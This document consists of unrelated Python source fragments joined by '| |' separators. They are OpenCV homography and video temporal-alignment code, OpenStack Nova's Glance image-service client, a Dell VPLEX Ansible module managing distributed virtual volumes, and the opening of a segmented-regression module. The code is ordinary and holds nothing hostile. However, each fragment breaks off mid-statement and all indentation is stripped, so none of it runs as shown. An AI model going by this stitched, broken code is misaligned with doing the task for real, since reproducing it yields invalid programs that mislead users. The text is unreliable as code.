"However, if not all of the point pairs (srcPoints
i ,:math:dstPoints_i ) fit the rigid perspective transformation (that is,
there are some outliers), this initial estimate will be poor."
"In this case, you can use one of the two robust methods.
Both methods, RANSAC and LMeDS , try many different random subsets
of the corresponding point pairs (of four pairs each), estimate
the homography matrix using this subset and a simple least-square
algorithm, and then compute the quality/goodness of the computed
homography (which is the number of inliers for RANSAC or the median
re-projection error for LMeDs). The best subset is then used to
produce the initial estimate of the homography matrix and the
mask of inliers/outliers."
"""
t1 = float(cv2.getTickCount())
#cv2.findHomography(srcPoints, dstPoints[, method[, ransacReprojThreshold[, mask ]]]) --> ret-val, mask
H, status = cv2.findHomography(srcPoints=p1, dstPoints=p2, \
method=cv2.RANSAC, ransacReprojThreshold=5.0) #, mask=3.0)
t2 = float(cv2.getTickCount())
myTime = (t2 - t1) / cv2.getTickFrequency()
common.DebugPrint(
"FeatureMatchAndHomography(): cv2.findHomography() took %.6f [sec]" % \
(myTime))
#if True:
if False:
print "status = %s" % (str(status))
#assert status != None #This assertion is violated (at least on OpenCV 3.0)
if status == None:
status = []
if H == None:
print "!!!!!!!!found H None - len(p1) = %d" % (len(p1))
H = []
return (-1, len(p1))
print "%d / %d inliers/matched (len(p1) = %d)" % (np.sum(status), len(status), len(p1))
# Note: H is the homography matrix, a 3x3 matrix.
common.DebugPrint(
"H, the homography matrix, from cv2.findHomography = %s" % str(H))
common.DebugPrint(" len(H) = %d" % len(H))
# Note that len(status) == len(p1)
res = (np.sum(status), len(status))
else:
H, status = None, None
common.DebugPrint(
"%d matches found, not enough for homography estimation" % len(p1))
res = (-1, len(p1))
# The result is related to the homography transformation: status sum and len
return res
"""
Avoid using so many globals.
Should we have modules:
TemporalAlignment
SpatialAlignment
Clustering
?
!!!!TODO !!!!!!!! Do better interface for the processing pipeline:
e.g., TODO
- implement return (frame, ref_frame, feature_set, ref_feature_set)
(frame, ref_frame, feature_set, ref_feature_set)
- frame este un frame din filmul curent
- ref_frame este frame-ul cel mai apropiat din filmul referinta
- feature_set este multimea descriptorilor SIFT/ORB/whatever extrasi din frame
- ref_feature_set este multimea descriptorilor SIFT/ORB/whatever extrasi din ref_frame
- pasul de spatial aligment urmareste sa identificam sectiunile
din frame care nu se regasesc in ref_frame, si sa eliminam din feature_set
acele features care cad in afara zonei de suprapunere intre frame si
ref_frame.
Pasul de aliniere spatiala livreaza catre clustering un tuplu (frame,
reduced_feature_set), unde:
- frame este un cadru din filmul curent (nici o modificare fata de ce am
primit de la alinierea temporala)
- reduced_feature_set este submultimea lui feature_set care indeplineste
conditia ca feature-ul se afla intr-o zona de suprapunere a lui
frame cu ref_frame
- pasul Clustering livreaza urmatoarele: (frame, cluster_areas), unde:
- frame iarasi e nemodificat
- cluster_areas reprezinta definitiile spatiale ale clusterelor identificate
Currently the Rest() of the pipepline is called by TemporalAlignment, when
found an optimal candidate.
Temporal alignment:
- for each reference frame:
- we also detect features (and compute descriptors) for reference frame
- FeatureMatchAndHomography()
- knnMatch()
- FilterKeypointsMatches()
- homography
"""
def TemporalAlignment(counterQ, frameQ, captureR, numFramesR, \
numFeaturesMatched, fOutput):
global p1, p2, kp_pairs, status, H, nonp1
if config.USE_EXHAUSTIVE_SEARCH:
maxFeaturesMatched = -2000000000 #-1
posMaxFeaturesMatched = -1
while True:
if config.OCV_OLD_PY_BINDINGS:
frameR = captureR.get(cv2.cv.CV_CAP_PROP_POS_FRAMES)
else:
frameR = captureR.get(cv2.CAP_PROP_POS_FRAMES)
common.DebugPrint("Alex: frameR = %d" % frameR)
counterR = int(frameR) #0
ret2, imgR = captureR.read()
if (ret2 == False) or (counterR > numFramesR):
break
#if False and config.SAVE_FRAMES:
if config.SAVE_FRAMES:
fileName = config.IMAGES_FOLDER + "/imgR_%05d.png" % counterR
if not os.path.exists(fileName):
#print "dir(imgR) = %s"% str(dir(imgR))
"""
imgRCV = cv.fromarray(imgR)
cv2.imwrite(fileName, imgRCV)
"""
cv2.imwrite(fileName, imgR)
#quit()
if False:
#if True:
print "Alex: ret1 = %s" % (str(ret1))
print "Alex: imgQ = %s" % (str(imgQ))
print "Alex: ret2 = %s" % (str(ret2))
print "Alex: imgR = %s" % (str(imgR))
if False:
cv2.imshow("imgQ", imgQ)
cv2.imshow("imgR", imgR)
if False:
#result = processFrame(img)
result = img
cv2.imshow("some", result)
if 0xFF & (cv2.waitKey(5) == 27):
break
"""
I don't need to change to gray image if I do NOT do
MatchFrames....() , which requires gray to
concatenate the 2 frames together.
"""
if False:
#if True:
"""
Note: imgQ and imgR are RGB-images.
I need to convert them to grayscale
(since cv2.imread(fn1, 0) reads grayscale)
"""
imgR = common.ConvertImgToGrayscale(imgR)
res = ComputeFeaturesAndMatch2(imgR, counterR)
# res[1] = number of matched features
COST_USED = 1
if COST_USED == 0:
pass
else:
# myTemporalAlignmentCost is the sum of distances of best-pairs (closest neighbors) of matched features
res = (res[0], -myTemporalAlignmentCost)
#res = (res[0], -myTemporalAlignmentCost / res[1])
numFeaturesMatched[counterQ][counterR] = res[1]
COMPUTE_BEST_FAST = False #True
if maxFeaturesMatched < res[1]:
maxFeaturesMatched = res[1]
posMaxFeaturesMatched = counterR
if config.SAVE_FRAMES:
if COMPUTE_BEST_FAST == False:
"""
#!!!!TODO: don't do it even for best candidates - only for the best ONE - this implies redoing probably some computation from TemporalAlignment() for the best frame pair
We call Rest() in order to compute vis and visOrig.
"""
Rest("Image Match")
visBest = vis.copy()
visOrigBest = visOrig.copy()
else:
p1Best = p1
p2Best = p2
kp_pairsBest = kp_pairs
statusBest = status
HBest = H
nonp1Best = nonp1
#if True:
if False:
#res = ComputeFeaturesAndMatch2(imgR, counterR) # We repeat the MatchFrame to save the frames
"""
visCV = cv.fromarray(vis)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterR), visCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterR), vis)
"""
visCV = cv.fromarray(visBest)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/1img_proc_%05d_%05d.png" % \
(counterQ, counterR), visCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/1img_proc_%05d_%05d.png" % \
(counterQ, counterR), vis)
common.DebugPrint("Alex: counterR = %d" % counterR)
counterR += config.counterRStep
if False:
counterQ += config.counterQStep #10 #1
"""
If we try to seek to a frame out-of-bounds frame it gets to
the last one.
"""
if config.OCV_OLD_PY_BINDINGS:
captureR.set(cv2.cv.CV_CAP_PROP_POS_FRAMES, counterR)
else:
captureR.set(cv2.CAP_PROP_POS_FRAMES, counterR)
common.DebugPrint("Alex: Time = %s" % \
common.GetCurrentDateTimeStringWithMilliseconds())
myText = " Frame #%d of video A: " \
"frame #%d of video B, with %d features matched (time = %s)" % \
(counterQ, posMaxFeaturesMatched, maxFeaturesMatched,
common.GetCurrentDateTimeStringWithMilliseconds())
print >>fOutput, myText
fOutput.flush()
#posMaxFeaturesMatched = counterR
counterRBest = posMaxFeaturesMatched
else:
# We empty the memoization cache before SimAnneal.main()
SimAnneal.Acache = {}
res = SimAnneal.main()
res2 = (res[0], -res[1])
common.DebugPrint(
"Best solution for frame counterQ=%d is %s. Time = %s" % \
(counterQ, str(res2), GetCurrentDateTimeStringWithMilliseconds()) )
#!!!!TODO: check if OK:
counterRBest = res[0]
if COMPUTE_BEST_FAST == True:
"""
!!!!TODO: check that these assignments really refer the objects defined above (when updating) and that there are no escapes of the values/objects that result in side-effects updating the respective objects and messing everything up - better said we look if redefinitons of the rhs are done inside (some of their subelements) or totally (reassign a completely NEW object).
"""
p1 = p1Best
p2 = p2Best
kp_pairs = kp_pairsBest
status = statusBest
H = HBest
nonp1 = nonp1Best
Rest("Image Match")
visBest = vis.copy()
visOrigBest = visOrig.copy()
if config.SAVE_FRAMES:
if False:
# We move the existing image pair of the matched frames to a special folder
srcFileName = "img_proc_%05d_%05d.png" % (counterQ, counterRBest)
dstFileName = config.FRAME_PAIRS_MATCHES_FOLDER + "/" + srcFileName
srcFileName = config.FRAME_PAIRS_FOLDER + "/" + srcFileName
try:
shutil.move(srcFileName, dstFileName)
except shutil.Error as exc:
pass
"""
We display frames imgQ and imgR with features (from temporal) and
clusters on them.
"""
"""
visBestCV = cv.fromarray(visBest)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterRBest), visBestCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterRBest), visBest)
# We display also the orig frames imgQ and imgR
"""
visOrigBestCV = cv.fromarray(visOrigBest)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d_orig.png" % \
(counterQ, counterRBest), visOrigBestCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d_orig.png" % \
(counterQ, | |
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of an image service that uses Glance as the backend."""
from __future__ import absolute_import
import copy
import inspect
import itertools
import os
import random
import re
import stat
import sys
import time
import cryptography
from cursive import certificate_utils
from cursive import exception as cursive_exception
from cursive import signature_utils
import glanceclient
import glanceclient.exc
from glanceclient.v2 import schemas
from keystoneauth1 import loading as ks_loading
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from oslo_utils import timeutils
import six
from six.moves import range
import six.moves.urllib.parse as urlparse
import nova.conf
from nova import exception
import nova.image.download as image_xfers
from nova import objects
from nova.objects import fields
from nova import service_auth
from nova import utils
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
_SESSION = None
def _session_and_auth(context):
# Session is cached, but auth needs to be pulled from context each time.
global _SESSION
if not _SESSION:
_SESSION = ks_loading.load_session_from_conf_options(
CONF, nova.conf.glance.glance_group.name)
auth = service_auth.get_auth_plugin(context)
return _SESSION, auth
def _glanceclient_from_endpoint(context, endpoint, version):
sess, auth = _session_and_auth(context)
return glanceclient.Client(version, session=sess, auth=auth,
endpoint_override=endpoint,
global_request_id=context.global_id)
def generate_glance_url(context):
"""Return a random glance url from the api servers we know about."""
return next(get_api_servers(context))
def _endpoint_from_image_ref(image_href):
"""Return the image_ref and guessed endpoint from an image url.
:param image_href: href of an image
:returns: a tuple of the form (image_id, endpoint_url)
"""
parts = image_href.split('/')
image_id = parts[-1]
# the endpoint is everything in the url except the last 3 bits
# which are version, 'images', and image_id
endpoint = '/'.join(parts[:-3])
return (image_id, endpoint)
def generate_identity_headers(context, status='Confirmed'):
return {
'X-Auth-Token': getattr(context, 'auth_token', None),
'X-User-Id': getattr(context, 'user_id', None),
'X-Tenant-Id': getattr(context, 'project_id', None),
'X-Roles': ','.join(getattr(context, 'roles', [])),
'X-Identity-Status': status,
}
def get_api_servers(context):
"""Shuffle a list of service endpoints and return an iterator that will
cycle through the list, looping around to the beginning if necessary.
"""
# NOTE(efried): utils.get_ksa_adapter().get_endpoint() is the preferred
# mechanism for endpoint discovery. Only use `api_servers` if you really
# need to shuffle multiple endpoints.
if CONF.glance.api_servers:
api_servers = CONF.glance.api_servers
random.shuffle(api_servers)
else:
sess, auth = _session_and_auth(context)
ksa_adap = utils.get_ksa_adapter(
nova.conf.glance.DEFAULT_SERVICE_TYPE,
ksa_auth=auth, ksa_session=sess,
min_version='2.0', max_version='2.latest')
endpoint = utils.get_endpoint(ksa_adap)
if endpoint:
# NOTE(mriedem): Due to python-glanceclient bug 1707995 we have
# to massage the endpoint URL otherwise it won't work properly.
# We can't use glanceclient.common.utils.strip_version because
# of bug 1748009.
endpoint = re.sub(r'/v\d+(\.\d+)?/?$', '/', endpoint)
api_servers = [endpoint]
return itertools.cycle(api_servers)
class GlanceClientWrapper(object):
"""Glance client wrapper class that implements retries."""
def __init__(self, context=None, endpoint=None):
version = 2
if endpoint is not None:
self.client = self._create_static_client(context,
endpoint,
version)
else:
self.client = None
self.api_servers = None
def _create_static_client(self, context, endpoint, version):
"""Create a client that we'll use for every call."""
self.api_server = str(endpoint)
return _glanceclient_from_endpoint(context, endpoint, version)
def _create_onetime_client(self, context, version):
"""Create a client that will be used for one call."""
if self.api_servers is None:
self.api_servers = get_api_servers(context)
self.api_server = next(self.api_servers)
return _glanceclient_from_endpoint(context, self.api_server, version)
def call(self, context, version, method, *args, **kwargs):
"""Call a glance client method. If we get a connection error,
retry the request according to CONF.glance.num_retries.
"""
retry_excs = (glanceclient.exc.ServiceUnavailable,
glanceclient.exc.InvalidEndpoint,
glanceclient.exc.CommunicationError)
num_attempts = 1 + CONF.glance.num_retries
for attempt in range(1, num_attempts + 1):
client = self.client or self._create_onetime_client(context,
version)
try:
controller = getattr(client,
kwargs.pop('controller', 'images'))
result = getattr(controller, method)(*args, **kwargs)
if inspect.isgenerator(result):
# Convert generator results to a list, so that we can
# catch any potential exceptions now and retry the call.
return list(result)
return result
except retry_excs as e:
if attempt < num_attempts:
extra = "retrying"
else:
extra = 'done trying'
LOG.exception("Error contacting glance server "
"'%(server)s' for '%(method)s', "
"%(extra)s.",
{'server': self.api_server,
'method': method, 'extra': extra})
if attempt == num_attempts:
raise exception.GlanceConnectionFailed(
server=str(self.api_server), reason=six.text_type(e))
time.sleep(1)
class GlanceImageServiceV2(object):
"""Provides storage and retrieval of disk image objects within Glance."""
def __init__(self, client=None):
self._client = client or GlanceClientWrapper()
# NOTE(jbresnah) build the table of download handlers at the beginning
# so that operators can catch errors at load time rather than whenever
# a user attempts to use a module. Note this cannot be done in glance
# space when this python module is loaded because the download module
# may require configuration options to be parsed.
self._download_handlers = {}
download_modules = image_xfers.load_transfer_modules()
for scheme, mod in download_modules.items():
if scheme not in CONF.glance.allowed_direct_url_schemes:
continue
try:
self._download_handlers[scheme] = mod.get_download_handler()
except Exception as ex:
LOG.error('When loading the module %(module_str)s the '
'following error occurred: %(ex)s',
{'module_str': str(mod), 'ex': ex})
def show(self, context, image_id, include_locations=False,
show_deleted=True):
"""Returns a dict with image data for the given opaque image id.
:param context: The context object to pass to image client
:param image_id: The UUID of the image
:param include_locations: (Optional) include locations in the returned
dict of information if the image service API
supports it. If the image service API does
not support the locations attribute, it will
still be included in the returned dict, as an
empty list.
:param show_deleted: (Optional) show the image even the status of
image is deleted.
"""
try:
image = self._client.call(context, 2, 'get', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not show_deleted and getattr(image, 'deleted', False):
raise exception.ImageNotFound(image_id=image_id)
if not _is_image_available(context, image):
raise exception.ImageNotFound(image_id=image_id)
image = _translate_from_glance(image,
include_locations=include_locations)
if include_locations:
locations = image.get('locations', None) or []
du = image.get('direct_url', None)
if du:
locations.append({'url': du, 'metadata': {}})
image['locations'] = locations
return image
def _get_transfer_module(self, scheme):
try:
return self._download_handlers[scheme]
except KeyError:
return None
except Exception:
LOG.error("Failed to instantiate the download handler "
"for %(scheme)s", {'scheme': scheme})
return
def detail(self, context, **kwargs):
"""Calls out to Glance for a list of detailed image information."""
params = _extract_query_params_v2(kwargs)
try:
images = self._client.call(context, 2, 'list', **params)
except Exception:
_reraise_translated_exception()
_images = []
for image in images:
if _is_image_available(context, image):
_images.append(_translate_from_glance(image))
return _images
@staticmethod
def _safe_fsync(fh):
"""Performs os.fsync on a filehandle only if it is supported.
fsync on a pipe, FIFO, or socket raises OSError with EINVAL. This
method discovers whether the target filehandle is one of these types
and only performs fsync if it isn't.
:param fh: Open filehandle (not a path or fileno) to maybe fsync.
"""
fileno = fh.fileno()
mode = os.fstat(fileno).st_mode
# A pipe answers True to S_ISFIFO
if not any(check(mode) for check in (stat.S_ISFIFO, stat.S_ISSOCK)):
os.fsync(fileno)
def download(self, context, image_id, data=None, dst_path=None,
trusted_certs=None):
"""Calls out to Glance for data and writes data."""
if CONF.glance.allowed_direct_url_schemes and dst_path is not None:
image = self.show(context, image_id, include_locations=True)
for entry in image.get('locations', []):
loc_url = entry['url']
loc_meta = entry['metadata']
o = urlparse.urlparse(loc_url)
xfer_mod = self._get_transfer_module(o.scheme)
if xfer_mod:
try:
xfer_mod.download(context, o, dst_path, loc_meta)
LOG.info("Successfully transferred using %s", o.scheme)
return
except Exception:
LOG.exception("Download image error")
try:
image_chunks = self._client.call(context, 2, 'data', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if image_chunks.wrapped is None:
# None is a valid return value, but there's nothing we can do with
# a image with no associated data
raise exception.ImageUnacceptable(image_id=image_id,
reason='Image has no associated data')
# Retrieve properties for verification of Glance image signature
verifier = self._get_verifier(context, image_id, trusted_certs)
close_file = False
if data is None and dst_path:
data = open(dst_path, 'wb')
close_file = True
if data is None:
# Perform image signature verification
if verifier:
try:
for chunk in image_chunks:
verifier.update(chunk)
verifier.verify()
LOG.info('Image signature verification succeeded '
'for image: %s', image_id)
except cryptography.exceptions.InvalidSignature:
with excutils.save_and_reraise_exception():
LOG.error('Image signature verification failed '
'for image: %s', image_id)
return image_chunks
else:
try:
for chunk in image_chunks:
if verifier:
verifier.update(chunk)
data.write(chunk)
if verifier:
verifier.verify()
LOG.info('Image signature verification succeeded '
'for image %s', image_id)
except cryptography.exceptions.InvalidSignature:
data.truncate(0)
with excutils.save_and_reraise_exception():
LOG.error('Image signature verification failed '
'for image: %s', image_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.error("Error writing to %(path)s: %(exception)s",
{'path': dst_path, 'exception': ex})
finally:
if close_file:
# Ensure that the data is pushed all the | |
'/name',
'value': new_dist_vv_name}]
dist_vv_details = self.distvv.patch_distributed_virtual_volume(
dist_vv_name, dist_vv_patch_payload)
LOG.info("Renamed the distributed virtual volume %s to %s",
dist_vv_name, new_dist_vv_name)
LOG.debug("Distributed Virtual Volume Details:\n%s",
dist_vv_details)
return dist_vv_details
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not rename distributed virtual volume {0} to {1}"
err_msg = err_msg.format(
dist_vv_name, new_dist_vv_name) + " due to error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def expand_distributed_vv(self, dist_vv_name, dist_vv_expand_payload):
"""
Expand the distributed virtual volume
"""
try:
dist_vv_details = self.distvv.expand_distributed_virtual_volume(
dist_vv_name, dist_vv_expand_payload)
LOG.info("Expanded the distributed virtual volume %s",
dist_vv_name)
LOG.debug("Distributed Virtual Volume Details:\n%s",
dist_vv_details)
return dist_vv_details
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not expand distributed virtual volume {0} due"
err_msg = err_msg.format(dist_vv_name) + " to error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def delete_distributed_vv(self, dist_vv_name):
"""
Delete the distributed virtual volume
"""
try:
self.distvv.delete_distributed_virtual_volume(
dist_vv_name)
LOG.info("Deleted distributed virtual volume %s", dist_vv_name)
return True
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not delete distributed virtual volume {0} due"
err_msg = err_msg.format(dist_vv_name) + " to error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def create_distributed_vv(self, dist_vv_payload):
"""
Create a distributed virtual volume
"""
try:
dist_vv_details = self.distvv.create_distributed_virtual_volume(
dist_vv_payload)
LOG.info("Created distributed virtual volume %s",
dist_vv_details.name)
LOG.debug("Distributed Virtual Volume Details:\n%s",
dist_vv_details)
return dist_vv_details
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not create distributed virtual volume due to"
err_msg = err_msg + " error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def get_dist_vv_by_id(self, dist_vv_id):
"""
Get distributed virtual volume details by using distributed virtual
volume id
"""
LOG.info("Trying to get distributed virtual volume by ID %s",
dist_vv_id)
data = [vol for vol in self.get_distributed_virtual_volumes()
if vol.system_id == dist_vv_id]
if len(data) > 0:
LOG.info("Found Distributed Virtual Volume details for %s from"
" ID %s", data[0].name, dist_vv_id)
LOG.debug("Distributed Virtual Volume Details: %s", data)
return data[0]
return None
def get_distributed_virtual_volumes(self):
"""
Get all distributed virtual volumes
"""
LOG.info("Get all distributed virtual volumes")
try:
res = self.distvv.get_distributed_virtual_volumes()
LOG.debug("Distributed Virtual Volumes Details: %s", res)
return res
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not get the distributed virtual volumes due to"
err_msg = err_msg + " error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def get_distributed_device(self, dev_name):
"""
Get distributed device details
"""
try:
dev = self.distvv.get_distributed_device(dev_name)
LOG.info("Got Distributed Device details %s", dev_name)
LOG.debug("Distributed Device Details: %s", dev)
return dev
except utils.ApiException as err:
err_msg = ("Could not get the distributed device {0} due to"
" error: {1}".format(dev_name, utils.error_msg(err)))
LOG.error("%s\n%s\n", err_msg, err)
return None
except (ValueError, TypeError) as err:
err_msg = "Could not get the distributed device {0} due to"
err_msg = err_msg + " error: {1}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def check_name_existence(self, name):
"""
Check for the existence of distributed virtual volume name across
clusters in Vplex setup
"""
LOG.info("Check for the distributed virtual volume name existence"
" across clusters")
cluster_details = self.cluster.get_clusters()
cl_name = [clus.name for clus in cluster_details
for vol in self.vvol.get_virtual_volumes(clus.name)
if vol.name == name]
if len(cl_name) > 0:
return cl_name[0]
return None
def validate_name(self, name, field): # pylint: disable=R0201
"""This method validates the name length and non-presence of
special characters"""
char_len = '63'
status, msg = utils.validate_name(name, char_len, field)
if not status:
LOG.error(msg)
self.module.fail_json(msg=msg)
else:
LOG.info(msg)
def perform_module_operation(self): # pylint: disable=R0912,R0914,R0915
"""
Perform different actions on the distributed virtual volume based on
user parameters specified in the playbook
"""
state = self.module.params['state']
dist_vv_name = self.module.params['distributed_virtual_volume_name']
thin_enable = self.module.params['thin_enable']
wait_for_rebuild = self.module.params['wait_for_rebuild']
dist_dev_name = self.module.params['distributed_device_name']
dist_vv_id = self.module.params['distributed_virtual_volume_id']
newvv_name = self.module.params['new_distributed_virtual_volume_name']
expand = self.module.params['expand']
dist_vv_details = None
new_vv_details = None
dev_details = None
check_flag = False
changed = False
def exit_module(changed, dist_vv_details):
self.result["changed"] = changed
if dist_vv_details:
dist_vv_details = utils.serialize_content(dist_vv_details)
self.result["dist_vv_details"] = dist_vv_details
self.module.exit_json(**self.result)
# Check status of the cluster, whether cluster link is disabled
degraded_cluster = utils.check_status_of_cluster(self.client)
# Get distributed virtual volume details
if dist_vv_id:
dist_vv_details = self.get_dist_vv_by_id(dist_vv_id)
if dist_vv_details is not None:
dist_vv_name = dist_vv_details.name
elif dist_vv_name:
dist_vv_details = self.get_distributed_vv(dist_vv_name)
# Common check for distributed virtual volume
if state == "present" and not dist_dev_name and \
dist_vv_details is None:
if dist_vv_id:
err_msg = ("Could not find distributed virtual volume with"
" distributed_virtual_volume_id {0}".format(
dist_vv_id))
else:
err_msg = ("Could not find distributed virtual volume"
" {0}".format(dist_vv_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Delete the distributed virtual volume
if state == "absent":
if dist_vv_details is None:
if dist_vv_id:
LOG.info("Distributed virtual volume with distributed_"
"virtual_volume_id %s is not present to"
" delete", dist_vv_id)
else:
LOG.info("Distributed virtual volume %s is not present"
" to delete", dist_vv_name)
exit_module(changed, dist_vv_details)
else:
if degraded_cluster:
err_msg = ("Could not delete the distributed virtual"
" volume {0} since the cluster {1} is"
" degraded".format(
dist_vv_name, degraded_cluster))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
elif dist_vv_details.service_status != 'unexported':
err_msg = ("Could not delete the distributed virtual"
" volume {0} since it is exported to storage"
" view".format(dist_vv_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
elif dist_vv_details.consistency_group is not None:
err_msg = ("Could not delete the distributed virtual"
" volume {0} since it is added to the"
" distributed consistency group {1}".format(
dist_vv_name,
dist_vv_details.consistency_group))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Perform delete operation
changed = self.delete_distributed_vv(dist_vv_name)
dist_vv_details = None
# Create a distributed virtual volume
if state == "present" and dist_dev_name:
if newvv_name:
err_msg = ("Could not perform create and rename in a single"
" task. Please specify each operation in"
" individual task")
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
if dist_vv_id:
err_msg = ("Could not perform create operation with"
" distributed_virtual_volume_id parameter. Instead"
", please specify distributed_virtual_volume_name")
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Check for the existence of distributed virtual volume
# name in other clusters
cls_name = self.check_name_existence(dist_vv_name)
if cls_name:
err_msg = ("Could not create distributed virtual volume"
" with name {0} as it is already used in {1}."
" Please specify a different distributed"
" virtual volume name".format(
dist_vv_name, cls_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
dev_details = self.get_distributed_device(dist_dev_name)
if dev_details is None:
err_msg = ("Could not find the distributed device {0} to"
" create distributed virtual volume on top of it."
" Please provide valid distributed device"
" name".format(dist_dev_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
elif not dev_details.virtual_volume and dist_vv_details:
err_msg = ("Could not create distributed virtual volume with"
" name {0} as it is already created on top of"
" another distributed device {1}. Please specify"
" a different distributed virtual volume"
" name".format(
dist_vv_name,
dist_vv_details.supporting_device))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
if dev_details.virtual_volume is not None:
vol_name = dev_details.virtual_volume.split('/')[-1]
if vol_name == dist_vv_name:
dist_vv_details = self.get_distributed_vv(vol_name)
LOG.info("Distributed virtual volume %s is already"
" created on distributed device %s",
vol_name, dist_dev_name)
check_flag = True
else:
err_msg = ("Could not create distributed virtual volume"
" with name {0} on top of distributed device"
" {1} as it already contains a distributed"
" virtual volume with name {2}".format(
dist_vv_name,
dev_details.name,
vol_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Check for both create/rename should not happen during cluster
# in degraded state
if not check_flag and degraded_cluster:
err_msg = ("Could not create the distributed virtual"
" volume since the cluster {0} is"
" degraded".format(degraded_cluster))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
if dev_details.virtual_volume is None:
if dev_details.rebuild_status in ['rebuilding', 'queued'] and \
wait_for_rebuild:
err_msg = ("Could not create the distributed virtual"
" volume as distributed device {0} is"
" rebuilding. Please try again later".format(
dist_dev_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Check for the existence of volume in other clusters
cls_name = self.check_name_existence(dist_dev_name + "_vol")
if cls_name:
err_msg = ("Could not create distributed virtual volume"
" with name {0} as it is already used in {1}."
" Please rename the distributed device"
" {2}".format(
dist_dev_name + "_vol", cls_name,
dist_dev_name))
LOG.error(err_msg)
self.module.fail_json(msg=err_msg)
# Validate the distributed virtual volume name
self.validate_name(dist_vv_name,
'distributed_virtual_volume_name')
# Perform create operation
uri = "/vplex/v2/distributed_storage/distributed_devices/"
dist_vv_payload = {'device': uri + dist_dev_name,
'thin': thin_enable}
dist_vv_details = self.create_distributed_vv(dist_vv_payload)
if dist_vv_details.name != dist_vv_name:
# Perform rename operation
dist_vv_details = self.rename_distributed_vv(
dist_vv_details.name, dist_vv_name)
changed = True
# Rename the distributed virtual volume
if state == "present" and dist_vv_details and newvv_name:
if newvv_name:
if dist_vv_details.name == newvv_name:
LOG.info("Distributed virtual volume name and new"
" distributed | |
"""
Alternative implementations of segmented regression routines.
"""
# Author: <NAME>
# License: BSD 3 clause
import numpy as np
from segreg.model.alt import regression_alt, one_bkpt_segreg_alt,\
likelihood_util
try:
from numba import jit
except ImportError as e:
from segreg.mockjit import jit
# cache can fill up and also cause issues; only turn on if stable
_CACHE_NUMBA = False
##########################################################################
# Hessian
##########################################################################
def ols_terms(indep, dep, u1, u2):
"""
"""
index1 = np.searchsorted(indep, u1, side='right')
index2 = np.searchsorted(indep, u2, side='right')
indep1 = indep[0:index1]
dep1 = dep[0:index1]
indep2 = indep[index1:index2]
dep2 = dep[index1:index2]
indep3 = indep[index2:]
dep3 = dep[index2:]
ols_terms_1 = regression_alt.ols_terms(indep1, dep1)
ols_terms_2 = regression_alt.ols_terms(indep2, dep2)
ols_terms_3 = regression_alt.ols_terms(indep3, dep3)
return ols_terms_1, ols_terms_2, ols_terms_3
def rss(params, ols_data1, ols_data2, ols_data3):
u1, v1, u2, v2, m1, m2 = params
rss1 = likelihood_util.rss_line_segment([u1, v1, m1], ols_data1)
mid_slope = (v2 - v1) / (u2 - u1)
rss2 = likelihood_util.rss_line_segment([u1, v1, mid_slope], ols_data2)
rss3 = likelihood_util.rss_line_segment([u2, v2, m2], ols_data3)
return rss1 + rss2 + rss3
def two_bkpt_loglik(params, indep, dep):
"""
Parameters
----------
params: list
[u1, v1, u2, v2, m1, m2, residual_variance]
indep: array-like
independent data
dep: array-like
dependent data
"""
u1, v1, u2, v2, m1, m2, resid_variance = params
